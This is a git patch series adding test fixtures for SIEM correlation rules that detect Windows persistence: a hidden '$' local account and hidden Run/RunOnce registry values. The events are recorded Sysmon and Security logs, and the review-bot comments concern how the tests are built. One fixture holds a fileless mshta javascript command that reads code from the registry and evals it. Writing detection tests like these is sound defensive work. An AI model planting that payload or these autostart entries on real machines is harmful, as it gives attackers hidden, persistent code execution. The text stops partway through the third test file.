@@ -0,0 +1,4 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"13\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"13\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-12-18 17:56:07.017817\"},\"EventRecordID\":\"596571\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3552\",\"ThreadID\":\"5004\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"Hidden Local Account Created\"},{\"Name\":\"EventType\",\"text\":\"SetValue\"},{\"Name\":\"UtcTime\",\"text\":\"2020-12-18 17:56:07.015\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-68dd-5fdd-0000-00101b660000}\"},{\"Name\":\"ProcessId\",\"text\":\"648\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\system32\\\\lsass.exe\"},{\"Name\":\"TargetObject\",\"text\":\"HKLM\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\hideme0007$\\\\(Default)\"},{\"Name\":\"Details\",\"text\":\"Binary Data\"}]}}}", "category.generic": "Registry Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "Hidden Local Account Created", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_13_Registry_value_changed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "13", "normalized": true, "object": "reg_object", "object.fullpath": 
"\\registry\\machine\\sam\\sam\\domains\\account\\users\\names\\hideme0007$\\(default)", "object.name": "(default)", "object.new_value": "binary data", "object.path": "\\registry\\machine\\sam\\sam\\domains\\account\\users\\names\\hideme0007$\\", "object.property": "value", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-08T16:20:45.153Z", "status": "success", "subject.process.fullpath": "c:\\windows\\system32\\lsass.exe", "subject.process.guid": "747f3d96-68dd-5fdd-0000-00101b660000", "subject.process.id": "648", "subject.process.name": "lsass.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-12-18T17:56:07.015Z", "type": "raw", "uuid": "efed3400-e354-43cf-b6da-b6ed33f18c0d"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "alert.context": "lsass.exe -> \\registry\\machine\\sam\\sam\\domains\\account\\users\\names\\hideme0007$\\", "alert.key": "\\registry\\machine\\sam\\sam\\domains\\account\\users\\names\\hideme0007$\\", "category.generic": "Attack", "category.high": "Persistence", "category.low": "Create User", "correlation_name": "Create_hidden_local_account", "correlation_type": "incident", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "Hidden Local Account Created", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Create_hidden_local_account|msedgewin10|lsass.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "reg_object", "object.fullpath": "\\registry\\machine\\sam\\sam\\domains\\account\\users\\names\\hideme0007$\\(default)", "object.name": 
"(default)", "object.new_value": "binary data", "object.path": "\\registry\\machine\\sam\\sam\\domains\\account\\users\\names\\hideme0007$\\", "object.property": "value", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\lsass.exe", "subject.process.guid": "747f3d96-68dd-5fdd-0000-00101b660000", "subject.process.id": "648", "subject.process.name": "lsass.exe", "subject.process.path": "c:\\windows\\system32\\"} \ No newline at end of file From 9a58add51cfc5c408275ae1607edc1ce409e344d Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Tue, 1 Aug 2023 12:01:43 +0300 Subject: [PATCH 41/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Create?= =?UTF-8?q?=5Fpersist=5Fvia=5FHidden=5FRun=5Fkey=5Fvalue)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Create_persist_via_Hidden_Run_key_value/tests/test_1.sc | 5 +++++ .../Create_persist_via_Hidden_Run_key_value/tests/test_2.sc | 5 +++++ .../Create_persist_via_Hidden_Run_key_value/tests/test_3.sc | 5 +++++ 3 files changed, 15 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_Hidden_Run_key_value/tests/test_1.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_Hidden_Run_key_value/tests/test_2.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_Hidden_Run_key_value/tests/test_3.sc 
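Review bot: The only comment in the file is the scaffold placeholder (`# Тут будет твой тест. В секции expect …`) rather than a description of the scenario, and the same placeholder is carried into all three Create_persist_via_Hidden_Run_key_value test files in the next patch. Replace it with a line that names the fixture and the discriminating field, e.g. `# Sysmon 13 from lsass.exe: SetValue on SAM\...\Users\Names\hideme0007$\(Default) — presumably the '$'-suffixed name is what the rule keys on (confirm); expect exactly one incident`. The fixture also holds only the positive event; a second lsass.exe SetValue on a `Names\<name>` key without the `$` suffix would pin down that the rule stays silent on ordinary account creation, the way the Hidden_Run_key_value tests already do with their second event. The file ends without a trailing newline (`\ No newline at end of file`), unlike its siblings.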
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_Hidden_Run_key_value/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_Hidden_Run_key_value/tests/test_1.sc new file mode 100644 index 00000000..fa399fcc --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_Hidden_Run_key_value/tests/test_1.sc 
@@ -0,0 +1,5 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"13\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"13\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2020-07-04T14:18:58.2687126Z\"},\"EventRecordID\":\"306346\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3400\",\"ThreadID\":\"4136\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"Persistence - Hidden Run value detected\"},{\"Name\":\"EventType\",\"text\":\"SetValue\"},{\"Name\":\"UtcTime\",\"text\":\"2020-07-04 14:18:58.231\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-8fd2-5f00-0000-0010c15d2200}\"},{\"Name\":\"ProcessId\",\"text\":\"3728\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\Public\\\\tools\\\\evasion\\\\a.exe\"},{\"Name\":\"TargetObject\",\"text\":\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\"},{\"Name\":\"Details\",\"text\":\"\\\"c:\\\\windows\\\\tasks\\\\taskhost.exe\\\"\"}]}}}", "category.generic": "Registry Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "Persistence - Hidden Run value detected", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_13_Registry_value_changed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "13", "normalized": true, 
"object": "reg_object", "object.fullpath": "\\registry\\machine\\software\\microsoft\\windows\\currentversion\\run\\", "object.new_value": "\"c:\\windows\\tasks\\taskhost.exe\"", "object.path": "\\registry\\machine\\software\\microsoft\\windows\\currentversion\\run\\", "object.property": "value", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-12T19:17:17.180Z", "status": "success", "subject.process.fullpath": "c:\\users\\public\\tools\\evasion\\a.exe", "subject.process.guid": "747f3d96-8fd2-5f00-0000-0010c15d2200", "subject.process.id": "3728", "subject.process.name": "a.exe", "subject.process.path": "c:\\users\\public\\tools\\evasion\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-07-04T14:18:58.231Z", "type": "raw", "uuid": "7e5ba700-f8f5-4874-a4ac-2a91c9dddd47"} +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"13\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"13\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-12T18:30:51.2794969Z\"},\"EventRecordID\":\"48185854\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3636\",\"ThreadID\":\"4616\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"win10-work.stand2008.local\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"T1547_001,Create Persistance: Registry Run Keys\"},{\"Name\":\"EventType\",\"text\":\"SetValue\"},{\"Name\":\"UtcTime\",\"text\":\"2023-06-12 
18:30:51.264\"},{\"Name\":\"ProcessGuid\",\"text\":\"{2b856446-645b-6487-ba09-00000000c100}\"},{\"Name\":\"ProcessId\",\"text\":\"2460\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\system32\\\\reg.exe\"},{\"Name\":\"TargetObject\",\"text\":\"HKLM\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\CalcImplant\"},{\"Name\":\"Details\",\"text\":\"C:\\\\Windows\\\\System32\\\\calc.exe\"},{\"Name\":\"User\",\"text\":\"STAND2008\\\\Администратор\"}]}}}", "category.generic": "Registry Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "win10-work.stand2008.local", "event_src.host": "win10-work.stand2008.local", "event_src.hostname": "win10-work", "event_src.rule": "T1547_001,Create Persistance: Registry Run Keys", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_13_Registry_value_changed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "13", "normalized": true, "object": "reg_object", "object.fullpath": "\\registry\\machine\\software\\wow6432node\\microsoft\\windows\\currentversion\\runonce\\calcimplant", "object.name": "calcimplant", "object.new_value": "c:\\windows\\system32\\calc.exe", "object.path": "\\registry\\machine\\software\\wow6432node\\microsoft\\windows\\currentversion\\runonce\\", "object.property": "value", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-12T19:17:17.180Z", "status": "success", "subject.account.domain": "stand2008", "subject.account.id": "synthetic:администратор@stand2008", "subject.account.name": "администратор", "subject.process.fullpath": "c:\\windows\\system32\\reg.exe", "subject.process.guid": "2b856446-645b-6487-ba09-00000000c100", "subject.process.id": "2460", 
"subject.process.name": "reg.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-12T18:30:51.264Z", "type": "raw", "uuid": "b4349995-7d1f-4292-9177-fe3ed9b7436d"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "category.generic": "Attack", "category.high": "Persistence", "category.low": "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder", "correlation_name": "Create_persist_via_Hidden_Run_key_value", "correlation_type": "incident", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.rule": "Persistence - Hidden Run value detected", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Create_persist_via_Hidden_Run_key_value|msedgewin10|a.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "reg_object", "object.fullpath": "\\registry\\machine\\software\\microsoft\\windows\\currentversion\\run\\", "object.new_value": "\"c:\\windows\\tasks\\taskhost.exe\"", "object.path": "\\registry\\machine\\software\\microsoft\\windows\\currentversion\\run\\", "object.property": "value", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\public\\tools\\evasion\\a.exe", "subject.process.guid": "747f3d96-8fd2-5f00-0000-0010c15d2200", "subject.process.id": "3728", "subject.process.name": "a.exe", "subject.process.path": "c:\\users\\public\\tools\\evasion\\"} 
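Review bot: The expected alert carries `"subject": "process"` here, while the otherwise parallel expectation in test_2 of the same rule (next file) carries `"subject": "account"`; the only visible difference on the input side is that the test_2 Sysmon event has a `User` data item and normalized `subject.account.*` fields, which this one lacks. If the rule derives `subject` from the presence of account fields, the alert's subject type depends on whether the collector's Sysmon build emits `User`, while `incident.aggregation.key` still ends in the process name in both files; that is worth a comment in the fixture, or a fixed value in the rule if it is not intended. The second event (reg.exe setting the named value `calcimplant` under RunOnce) is the negative control but nothing marks it as such; if the harness accepts comments between events, `# named value under RunOnce — must not match` before it would make the intent explicit.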
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_Hidden_Run_key_value/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_Hidden_Run_key_value/tests/test_2.sc new file mode 100644 index 00000000..1ff39eb6 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_Hidden_Run_key_value/tests/test_2.sc 
@@ -0,0 +1,5 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"13\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"13\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-12T18:38:16.4543484Z\"},\"EventRecordID\":\"48191421\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3636\",\"ThreadID\":\"4616\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"win10-work.stand2008.local\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"T1547_001,Create Persistance: Registry Run Keys\"},{\"Name\":\"EventType\",\"text\":\"SetValue\"},{\"Name\":\"UtcTime\",\"text\":\"2023-06-12 18:38:16.439\"},{\"Name\":\"ProcessGuid\",\"text\":\"{2b856446-6613-6487-dc09-00000000c100}\"},{\"Name\":\"ProcessId\",\"text\":\"11532\"},{\"Name\":\"Image\",\"text\":\"E:\\\\work\\\\projects\\\\InvisiblePersistence\\\\InvisibleKeys\\\\x64\\\\Release\\\\InvisibleRegKeys.exe\"},{\"Name\":\"TargetObject\",\"text\":\"HKU\\\\S-1-5-21-3800063338-4262557262-2801230003-500\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\"},{\"Name\":\"Details\",\"text\":\"\\\"C:\\\\WINDOWS\\\\system32\\\\mshta.exe\\\" \\\"javascript:z1kHl=\\\"SiBZQ\\\";I6M2=new ActiveXObject(\\\"WScript.Shell\\\");qs0Nn=\\\"2BEh4hFR\\\";lEgt9=I6M2.RegRead(\\\"HKCU\\\\\\\\software\\\\\\\\WUV\\\\\\\\Tethering\\\");dpP1iXav=\\\"hX9bkPRH\\\";eval(lEgt9);nro9M=\\\"ioQzi30v\\\";\\\"\"},{\"Name\":\"User\",\"text\":\"STAND2008\\\\Администратор\"}]}}}", "category.generic": "Registry Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "win10-work.stand2008.local", "event_src.host": "win10-work.stand2008.local", "event_src.hostname": "win10-work", 
"event_src.rule": "T1547_001,Create Persistance: Registry Run Keys", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_13_Registry_value_changed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "13", "normalized": true, "object": "reg_object", "object.fullpath": "\\registry\\user\\s-1-5-21-3800063338-4262557262-2801230003-500\\software\\microsoft\\windows\\currentversion\\run\\", "object.new_value": "\"c:\\windows\\system32\\mshta.exe\" \"javascript:z1khl=\"sibzq\";i6m2=new activexobject(\"wscript.shell\");qs0nn=\"2beh4hfr\";legt9=i6m2.regread(\"hkcu\\\\software\\\\wuv\\\\tethering\");dpp1ixav=\"hx9bkprh\";eval(legt9);nro9m=\"ioqzi30v\";\"", "object.path": "\\registry\\user\\s-1-5-21-3800063338-4262557262-2801230003-500\\software\\microsoft\\windows\\currentversion\\run\\", "object.property": "value", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-12T19:20:52.205Z", "status": "success", "subject.account.domain": "stand2008", "subject.account.id": "synthetic:администратор@stand2008", "subject.account.name": "администратор", "subject.process.fullpath": "e:\\work\\projects\\invisiblepersistence\\invisiblekeys\\x64\\release\\invisibleregkeys.exe", "subject.process.guid": "2b856446-6613-6487-dc09-00000000c100", "subject.process.id": "11532", "subject.process.name": "invisibleregkeys.exe", "subject.process.path": "e:\\work\\projects\\invisiblepersistence\\invisiblekeys\\x64\\release\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-12T18:38:16.439Z", "type": "raw", "uuid": "355b22a5-48d0-40ab-aaa3-0d5aae285250"} +{"action": "modify", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"13\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"13\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-12T18:30:05.5025934Z\"},\"EventRecordID\":\"48184711\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"3636\",\"ThreadID\":\"4616\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"win10-work.stand2008.local\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"T1547_001,Create Persistance: Registry Run Keys\"},{\"Name\":\"EventType\",\"text\":\"SetValue\"},{\"Name\":\"UtcTime\",\"text\":\"2023-06-12 18:30:05.499\"},{\"Name\":\"ProcessGuid\",\"text\":\"{2b856446-642d-6487-a509-00000000c100}\"},{\"Name\":\"ProcessId\",\"text\":\"12488\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\system32\\\\reg.exe\"},{\"Name\":\"TargetObject\",\"text\":\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunonceEx\\\\Line1\"},{\"Name\":\"Details\",\"text\":\"||c:\\\\windows\\\\system32\\\\cmd.exe\"},{\"Name\":\"User\",\"text\":\"STAND2008\\\\Администратор\"}]}}}", "category.generic": "Registry Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "win10-work.stand2008.local", "event_src.host": "win10-work.stand2008.local", "event_src.hostname": "win10-work", "event_src.rule": "T1547_001,Create Persistance: Registry Run Keys", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": 
"PT_Microsoft_Windows_eventlog_Sysmon_13_Registry_value_changed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "13", "normalized": true, "object": "reg_object", "object.fullpath": "\\registry\\machine\\software\\microsoft\\windows nt\\currentversion\\terminal server\\install\\software\\microsoft\\windows\\currentversion\\runonceex\\line1", "object.name": "line1", "object.new_value": "||c:\\windows\\system32\\cmd.exe", "object.path": "\\registry\\machine\\software\\microsoft\\windows nt\\currentversion\\terminal server\\install\\software\\microsoft\\windows\\currentversion\\runonceex\\", "object.property": "value", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-12T19:20:52.206Z", "status": "success", "subject.account.domain": "stand2008", "subject.account.id": "synthetic:администратор@stand2008", "subject.account.name": "администратор", "subject.process.fullpath": "c:\\windows\\system32\\reg.exe", "subject.process.guid": "2b856446-642d-6487-a509-00000000c100", "subject.process.id": "12488", "subject.process.name": "reg.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-12T18:30:05.499Z", "type": "raw", "uuid": "09245b1b-23b0-4de5-bcb1-2b7623fedc21"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "category.generic": "Attack", "category.high": "Persistence", "category.low": "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder", "correlation_name": "Create_persist_via_Hidden_Run_key_value", "correlation_type": "incident", "event_src.category": "Other", "event_src.fqdn": "win10-work.stand2008.local", "event_src.host": "win10-work.stand2008.local", "event_src.hostname": "win10-work", "event_src.rule": "T1547_001,Create Persistance: Registry Run Keys", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Create_persist_via_Hidden_Run_key_value|win10-work.stand2008.local|invisibleregkeys.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "reg_object", "object.fullpath": "\\registry\\user\\s-1-5-21-3800063338-4262557262-2801230003-500\\software\\microsoft\\windows\\currentversion\\run\\", "object.new_value": "\"c:\\windows\\system32\\mshta.exe\" \"javascript:z1khl=\"sibzq\";i6m2=new activexobject(\"wscript.shell\");qs0nn=\"2beh4hfr\";legt9=i6m2.regread(\"hkcu\\\\software\\\\wuv\\\\tethering\");dpp1ixav=\"hx9bkprh\";eval(legt9);nro9m=\"ioqzi30v\";\"", "object.path": "\\registry\\user\\s-1-5-21-3800063338-4262557262-2801230003-500\\software\\microsoft\\windows\\currentversion\\run\\", "object.property": "value", "status": "success", "subject": "account", "subject.account.domain": "stand2008", "subject.account.id": "synthetic:администратор@stand2008", "subject.account.name": "администратор", "subject.process.fullpath": "e:\\work\\projects\\invisiblepersistence\\invisiblekeys\\x64\\release\\invisibleregkeys.exe", "subject.process.guid": "2b856446-6613-6487-dc09-00000000c100", "subject.process.id": "11532", "subject.process.name": "invisibleregkeys.exe", 
"subject.process.path": "e:\\work\\projects\\invisiblepersistence\\invisiblekeys\\x64\\release\\"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_Hidden_Run_key_value/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_Hidden_Run_key_value/tests/test_3.sc new file mode 100644 index 00000000..152dc962 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_Hidden_Run_key_value/tests/test_3.sc 
@@ -0,0 +1,5 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4657\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12801\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-12T18:38:16.4541169Z\"},\"EventRecordID\":\"27723336\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"12384\"},\"Channel\":\"Security\",\"Computer\":\"win10-work.stand2008.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3800063338-4262557262-2801230003-500\"},{\"Name\":\"SubjectUserName\",\"text\":\"Администратор\"},{\"Name\":\"SubjectDomainName\",\"text\":\"STAND2008\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x4c7672\"},{\"Name\":\"ObjectName\",\"text\":\"\\\\REGISTRY\\\\USER\\\\S-1-5-21-3800063338-4262557262-2801230003-500\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\"},{\"Name\":\"ObjectValueName\"},{\"Name\":\"HandleId\",\"text\":\"0x46004f00530000\"},{\"Name\":\"OperationType\",\"text\":\"TWARE\\\\\"},{\"Name\":\"OldValueType\",\"text\":\"°\"},{\"Name\":\"OldValue\"},{\"Name\":\"NewValueType\"},{\"Name\":\"NewValue\",\"text\":\"%%1904\"},{\"Name\":\"ProcessId\",\"text\":\"0x2d0000002d\"},{\"Name\":\"ProcessName\",\"text\":\"%%1873\"}]}}}", "category.generic": "Registry Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Operating system", "event_src.fqdn": "win10-work.stand2008.local", "event_src.host": "win10-work.stand2008.local", "event_src.hostname": "win10-work", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4657_Registry_value_changed", 
"importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4657", "normalized": true, "object": "reg_object", "object.fullpath": "\\registry\\user\\s-1-5-21-3800063338-4262557262-2801230003-500\\software\\microsoft\\windows\\currentversion\\run\\", "object.new_value": "%%1904", "object.path": "\\registry\\user\\s-1-5-21-3800063338-4262557262-2801230003-500\\software\\microsoft\\windows\\currentversion\\run", "object.property": "value", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-12T19:31:34.631Z", "status": "success", "subject": "account", "subject.account.domain": "stand2008", "subject.account.id": "S-1-5-21-3800063338-4262557262-2801230003-500", "subject.account.name": "администратор", "subject.account.session_id": "5011058", "subject.process.fullpath": "%%1873", "subject.process.name": "%%1873", "subject.process.path": "", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-12T18:38:16.454Z", "type": "raw", "uuid": "fcb41669-3b01-4f60-ac0c-e7e34b38d3b1"} +{"action": "modify", "body": 
